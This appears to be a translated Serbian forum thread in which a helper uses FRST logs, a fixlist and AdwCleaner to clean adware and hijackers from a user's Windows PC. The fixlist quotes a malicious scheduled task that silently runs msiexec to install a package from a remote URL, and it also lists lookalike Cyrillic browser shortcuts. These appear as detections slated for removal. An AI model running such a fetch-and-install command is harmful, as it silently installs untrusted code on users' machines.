2017-08-09 22:02 - 2017-08-01 04:20 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-08-09 22:02 - 2017-08-01 04:20 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2017-08-09 22:02 - 2017-08-01 04:20 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2017-08-09 22:02 - 2017-08-01 04:20 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2017-08-09 22:02 - 2017-08-01 04:17 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MdmDiagnostics.dll
2017-08-09 22:02 - 2017-08-01 04:16 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2017-08-09 22:02 - 2017-08-01 04:15 - 000239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2017-08-09 22:02 - 2017-08-01 04:13 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll
2017-08-09 22:02 - 2017-08-01 04:12 - 000404992 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2017-08-09 22:02 - 2017-08-01 04:09 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-08-09 22:02 - 2017-08-01 04:01 - 000242688 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2017-08-07 18:11 - 2017-08-07 18:11 - 000000979 _____ C:\Users\Public\Desktop\AVG Protection.lnk
2017-08-07 18:11 - 2017-08-07 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2017-08-07 18:08 - 2017-08-07 18:08 - 000000000 ___HD C:\$AVG
2017-08-07 18:06 - 2017-08-27 16:21 - 000000000 ____D C:\ProgramData\MFAData
2017-08-05 17:21 - 2017-08-05 17:21 - 000001321 _____ C:\Users\dejan\Desktop\Continue Adobe Flash Player Installation.lnk
2017-08-05 00:15 - 2017-08-05 00:15 - 000005554 _____ C:\WINDOWS\system32\PerfStringBackup.TMP
2017-08-04 01:05 - 2017-07-28 06:48 - 001972128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-08-04 01:05 - 2017-07-28 06:48 - 001854832 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000358816 _____ (Microsoft Corporation) C:\WINDOWS\system32\halmacpi.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000358816 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000100232 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcd.dll
2017-08-04 01:05 - 2017-07-28 06:47 - 002259768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-08-04 01:05 - 2017-07-28 06:47 - 000572320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2017-08-04 01:05 - 2017-07-28 06:44 - 000239008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-08-04 01:05 - 2017-07-28 06:40 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-08-04 01:05 - 2017-07-28 06:40 - 000551200 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-08-04 01:05 - 2017-07-28 06:39 - 000434592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-08-04 01:05 - 2017-07-28 06:38 - 004213656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2017-08-04 01:05 - 2017-07-28 06:38 - 000216504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-08-04 01:05 - 2017-07-28 06:37 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 006761568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 005808640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 002424024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 000866808 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2017-08-04 01:05 - 2017-07-28 06:35 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-08-27 16:22 - 2017-06-27 13:53 - 000227188 _____ C:\WINDOWS\ZAM.krnl.trace
2017-08-27 16:22 - 2017-06-27 13:53 - 000202465 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-08-27 16:18 - 2017-03-18 08:02 - 000008192 _____ C:\WINDOWS\system32\config\ELAM
2017-08-27 16:15 - 2017-06-13 16:52 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-27 02:00 - 2017-03-07 16:58 - 000000000 ____D C:\Users\dejan\AppData\Local\Adobe
2017-08-27 00:19 - 2017-05-28 21:24 - 000000000 ____D C:\Program Files\Mozilla Firefox
2017-08-26 23:52 - 2017-04-26 16:31 - 000000000 ____D C:\Users\dejan\AppData\Local\Facebook
2017-08-26 23:49 - 2017-06-13 16:57 - 000000000 ____D C:\Users\dejan
2017-08-26 23:49 - 2016-09-24 16:45 - 000000000 ____D C:\Users\dejan\AppData\Roaming\Messenger for Desktop
2017-08-26 19:39 - 2016-11-18 20:21 - 000000000 ____D C:\Users\dejan\AppData\Roaming\DMCache
2017-08-26 18:39 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-25 19:14 - 2017-03-11 19:22 - 000000000 ____D C:\Users\dejan\AppData\Roaming\IDM
2017-08-25 18:31 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-08-25 14:29 - 2017-03-18 20:23 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-25 14:29 - 2017-01-28 21:39 - 000002218 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-25 14:29 - 2017-01-28 21:39 - 000002206 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-08-25 14:29 - 2016-09-07 15:27 - 000000000 ____D C:\Users\dejan\AppData\Local\Packages
2017-08-25 14:26 - 2017-06-15 22:56 - 000000000 ____D C:\Program Files\Popcorn Time
2017-08-25 14:23 - 2017-06-13 17:29 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-23 23:25 - 2017-03-15 17:46 - 000002282 _____ C:\Users\dejan\Desktop\Google Chrome.lnk
2017-08-23 23:19 - 2017-06-30 19:01 - 000154124 ____N C:\WINDOWS\Minidump\082317-49609-01.dmp
2017-08-23 23:19 - 2017-06-13 17:56 - 000000000 ____D C:\WINDOWS\Minidump
2017-08-23 00:23 - 2017-01-01 00:36 - 000000000 ____D C:\Users\dejan\AppData\Roaming\vlc
2017-08-22 22:33 - 2017-04-17 20:40 - 000000000 ____D C:\Users\dejan\Downloads\Compressed
2017-08-19 19:13 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-08-14 23:50 - 2017-03-18 08:02 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2017-08-12 19:41 - 2017-03-18 20:21 - 000000000 ____D C:\WINDOWS\INF
2017-08-12 19:39 - 2016-09-08 21:40 - 000001038 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-08-12 19:33 - 2016-09-08 21:40 - 000000000 ____D C:\Program Files\CCleaner
2017-08-12 12:34 - 2017-03-18 20:14 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-11 03:32 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\rescache
2017-08-11 00:17 - 2017-06-13 16:51 - 000223632 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-09 22:09 - 2016-09-07 17:53 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-09 22:04 - 2016-09-07 17:53 - 137505280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-08 23:48 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-08-08 19:10 - 2016-12-06 00:06 - 000170200 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-07 22:50 - 2016-12-09 23:37 - 000000000 ____D C:\Users\dejan\AppData\LocalLow\Mozilla
2017-08-07 19:15 - 2017-06-01 13:14 - 000000000 ____D C:\Users\dejan\AppData\Roaming\WinSAPSvc
2017-08-07 19:09 - 2017-05-27 15:46 - 000000000 ____D C:\Users\dejan\AppData\Local\terana
2017-08-07 18:55 - 2017-06-01 13:14 - 000000000 ____D C:\Users\dejan\AppData\Local\glory
2017-08-07 18:12 - 2016-09-14 15:56 - 000000000 ____D C:\Users\dejan\AppData\Local\Avg
2017-08-07 18:11 - 2017-03-18 20:23 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2017-08-07 18:06 - 2016-12-31 15:39 - 000000000 ____D C:\Program Files\AVG
2017-08-07 18:06 - 2016-09-14 15:56 - 000000000 ____D C:\ProgramData\Avg
2017-08-07 18:05 - 2016-09-14 15:56 - 000000000 ____D C:\Users\dejan\AppData\Local\AvgSetupLog
2017-08-07 18:01 - 2016-09-14 16:26 - 000000000 ____D C:\Users\dejan\AppData\Roaming\AVG
2017-08-05 00:14 - 2016-04-27 06:38 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-04 19:18 - 2017-06-13 17:17 - 001135462 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-31 17:15 - 2017-03-18 20:25 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2017-07-31 17:15 - 2017-03-18 20:25 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2017-07-29 00:05 - 2016-10-02 00:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOM
2017-07-29 00:05 - 2016-09-07 23:10 - 000001230 _____ C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\GOM Player.lnk
2017-07-29 00:05 - 2016-09-07 23:10 - 000001206 _____ C:\Users\Public\Desktop\GOM Player.lnk

==================== Files in the root of some directories =======

2016-09-23 15:24 - 2016-10-19 12:50 - 000000396 _____ () C:\Users\dejan\AppData\Roaming\burnaware.ini
2016-12-09 01:04 - 2017-02-03 01:46 - 000001002 _____ () C:\Users\dejan\AppData\Roaming\downloads.json
2016-12-26 18:32 - 2016-12-26 18:32 - 000000353 _____ () C:\Users\dejan\AppData\Roaming\imagetuner.ini
2016-12-10 20:57 - 2016-12-11 23:26 - 000004608 _____ () C:\Users\dejan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-04-16 20:41 - 2017-04-16 20:41 - 000003370 _____ () C:\Users\dejan\AppData\Local\recently-used.xbel
2017-06-12 15:05 - 2017-06-12 15:05 - 000000017 _____ () C:\Users\dejan\AppData\Local\resmon.resmoncfg
2017-01-04 22:23 - 2017-01-07 22:01 - 000000176 _____ () C:\Users\dejan\AppData\Local\uts.ini

Files to move or delete:
====================
C:\Users\dejan\k350n_.reg


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-08-12 20:08

==================== End of FRST.txt ============================

offline
  • Joined: 14 Jun 2016
  • Posts: 535

Open Notepad and copy the following text, which is inside the Code box.

CreateRestorePoint:
(Popcorn Time) C:\Program Files\Popcorn Time\Updater.exe
C:\Program Files\Popcorn Time
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.google.com/","hxxp://www.youndoo.com/?z=61bcc231723f316e9912186g2z5b6teo2w2zazczaq&from=amz&uid=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&type=hp","hxxp://www.search.ask.com/?o=APN10640A&gct=hp&d=473-102&v=a12627-333&t=4","hxxp://www.initialsite123.com/?z=53e8deaf6335b4feab6622eg8z8t0g5mbw7q9b8w6o&from=icb&uid=HitachiXHDS721050CLA362_JPF521HA3EJ06V3EJ06VX&type=hp"
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-27] <==== ATTENTION
C:\Users\dejan\k350n_.reg
R2 Update service; C:\Program Files\Popcorn Time\Updater.exe [339968 2016-08-26] (Popcorn Time) [File not signed]
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}\InprocServer32 -> no filepath
Task: {9931FCAE-5037-4F66-83F7-2B0B40881B5A} - System32\Tasks\Pegasbetotion => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200AVJS-63B6A0_WD-WCAT1A29657496574&v=2017311 /q <==== ATTENTION
Task: {C7442C22-8DE8-4479-8FEA-9A361A58BAD6} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe <==== ATTENTION
C:\Program Files\MIO
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.erolpxei.bat (No File) <==== Cyrillic
Shortcut: C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk -> C:\Users\dejan\AppData\Roaming\Browsers\exe.emorhc.bat (No File) <==== Cyrillic
FirewallRules: [{2A579B6B-B7F1-4878-B269-A5FFA4D229F6}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
FirewallRules: [{FB0D2782-31A0-45C9-BF51-38517A2BB1BB}] => (Allow) C:\Program Files\Popcorn Time\Updater.exe
C:\Users\dejan\AppData\Roaming\Browsers
C:\Program Files\Steerwardpriboly Builder


In Notepad, click File --> Save As
Under Encoding, select Unicode.
Name the file Fixlist and save it to the Desktop.
Double-click FRST.exe to run it again.
Click Fix and wait until the program finishes.
If the program asks to restart the computer, let it do so without interruption.
When it finishes, fixlog.txt will open, with contents that you should copy into the thread.
The file (fixlog.txt) will also be on the Desktop.


Go to the C:\Windows\Minidump folder and copy the file named 082317-49609-01.dmp to the Desktop. Then compress it and attach it to the thread.

offline
  • in administration
  • Joined: 16 Oct 2010
  • Posts: 3468
  • Location: KRAGUJEVAC

Fix result of Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Ran by dejan (29-08-2017 21:31:39) Run:4
Running from C:\Users\dejan\Desktop
Loaded Profiles: dejan (Available Profiles: dejan)
Boot Mode: Normal

==============================================

Restore point was successfully created.
C:\Program Files\Popcorn Time\Updater.exe
[2820] C:\Program Files\Popcorn Time\Updater.exe => process closed successfully.
C:\Program Files\Popcorn Time => moved successfully
Chrome StartupUrls => removed successfully.
C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData => moved successfully
C:\Users\dejan\k350n_.reg => moved successfully
HKLM\System\CurrentControlSet\Services\Update service => key removed successfully.
Update service => service removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\ChromeHTML => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-49C2F4479574} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07} => key removed successfully.
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001_Classes\CLSID\{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9931FCAE-5037-4F66-83F7-2B0B40881B5A} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9931FCAE-5037-4F66-83F7-2B0B40881B5A} => key removed successfully.
C:\Windows\System32\Tasks\Pegasbetotion => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pegasbetotion => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C7442C22-8DE8-4479-8FEA-9A361A58BAD6} => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7442C22-8DE8-4479-8FEA-9A361A58BAD6} => key removed successfully.
C:\Windows\System32\Tasks\Milimili => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully.
"C:\Program Files\MIO" => not found.
C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplorеr.lnk => moved successfully
C:\Users\dejan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Chrоmе.lnk => moved successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2A579B6B-B7F1-4878-B269-A5FFA4D229F6} => value removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FB0D2782-31A0-45C9-BF51-38517A2BB1BB} => value removed successfully.
"C:\Users\dejan\AppData\Roaming\Browsers" => not found.
"C:\Program Files\Steerwardpriboly Builder" => not found.

==== End of Fixlog 21:32:41 ====




offline
  • Joined: 14 Jun 2016
  • Posts: 535

Download Malwarebytes Anti-Malware from this or this or this link and install the application.
Run mb3-setup-consumer-{version}.exe and follow the instructions to install the program. After installation, click Finish.

On first launch, the program will display a "welcome" window. Feel free to close that window.
Note: The program's Premium features are already activated and are valid for 13 days from the moment of installation. You can turn off the Premium features in the Settings > My Account tab.

• Scanner settings - in Settings, click the Protection tab. Under the Scan Options section, enable the "Scan for rootkits" option.
• Prepare the settings for the Threat Scan - in Dashboard, click the Scan Now button. MBAM will update its database and start scanning.

When the scan finishes, if an infection has been detected, make sure everything is checked, then click Remove Selected. Restart the computer if the program asks for a restart.
• Provide the log: Under Reports, select the Scan Report with the current date and then click View Report.

Export the log to the Desktop:
- Click the Export button at the bottom, then choose 'Text file (*.txt)'
- In the Save File dialog that appears, click Desktop. In the File name: field, type "mbam" (without quotes) and click Save.
- The message "Your file has been successfully exported" will appear; click Ok and close the window.

• In your reply, attach the mbam.txt log using the "Attach file" ("Prikači fajl") option.


Then:

Download AdwCleaner and save it to the Desktop.
Double-click to run the program.
In the EULA window, click I agree.
In Tools, select Options.
In the dialog box that appears, turn off Reset Winsock settings if it is enabled.
Click the Scan button and wait for the scan to finish.
If it tells you that a newer version exists, make sure to download it.

Click the Clean button and wait for the program to finish.
The program will close all active programs and show a window with that warning. Click OK to confirm.
A message will appear saying that the computer needs to be restarted. Click OK.

The computer will restart and then open Notepad (C:\Adwcleaner\AdwCleaner[C0].txt) with the report.
Save that report to the Desktop and attach it to your post using the "Attach file" ("Prikači fajl") option.

offline
  • in administration
  • Joined: 16 Oct 2010
  • Posts: 3468
  • Location: KRAGUJEVAC

Posted: 31 Aug 2017 15:30

I don't have View Report; the computer asked for a restart and I did it, but I don't have the rest of this.

Addendum: 31 Aug 2017 16:20

Now, after running AdwCleaner, the system won't boot; I only get Automatic Repair, Diagnose PC. I have System Restore enabled, but it didn't complete and showed me this

offline
  • Joined: 14 Jun 2016
  • Posts: 535

Boot into Advanced Boot Options, open cmd and type: chkdsk /r

offline
  • in administration
  • Joined: 16 Oct 2010
  • Posts: 3468
  • Location: KRAGUJEVAC

I've already finished. I reset the system; everything important to me is on other partitions. Thanks.
